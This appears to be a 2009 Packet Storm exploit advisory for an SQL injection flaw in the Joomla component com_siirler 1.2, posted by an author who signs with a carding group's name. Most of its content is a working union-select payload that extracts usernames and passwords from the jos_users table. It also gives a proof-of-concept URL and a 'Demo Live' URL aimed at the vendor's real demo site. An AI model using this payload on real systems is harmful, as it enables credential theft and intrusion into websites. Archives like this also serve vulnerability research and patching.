Lucene search

K
packetstormV3n0mPACKETSTORM:80608
HistoryAug 25, 2009 - 12:00 a.m.

Joomla Siirler 1.2 SQL Injection

2009-08-2500:00:00
v3n0m
packetstormsecurity.com
43
`+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
| |  
| Joomla <= 1.5.x Component com_siirler 1.2 (sid) SQL Injection Vulnerability |  
| |  
| |  
| =================[Author]================== |  
| |  
| [+] Founded : v3n0m |  
| [+] Contact : v3n0m666[at]live[dot]com |  
| [+] Blog : http://0wnage.wordpress.com/ |  
| [+] Group : YOGYACARDERLINK |  
| [+] Site : http://yogyacarderlink.web.id/ |  
| [+] Date : August, 25th 2009 [INDONESIA] |  
| |  
| ================[Soft Info]================ |  
| |  
| Software: Siirler Bileseni |  
| Version : 1.2 RC (Legacy) |  
| Vendor : http://www.qproje.com/ |  
| License : GNU/GPL |  
| |  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
[-] Exploit:  
[+] +and+1=2+union+select+concat(username,char(58),password)+from+jos_users--  
  
[-] SQLi p0c:  
[+] http://localhost/[path]/index.php?option=com_siirler&task=sdetay&sid=[xxx]+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--  
[xxx] = Valid sid number  
  
[+] Demo Live:  
[-] http://demo.qproje.com/j15x/index.php?option=com_siirler&task=sdetay&sid=364+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--  
  
  
===========================  
[+] Greetz & Thanks [+]  
===========================  
RedLine Crew : Bang Musa,Mas Andre,Dagol,Yazid,Ogie  
YOGYACARDERLINK : leQhi,lingah,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,  
aRiee,yoga0400,ghareng,eidelweiss,pKi,kaka11  
  
g0t inspiration in my bedroom when i was flashback my mind about jogja & jovita  
PROUD TO BE INDONESIAN-  
  
  
`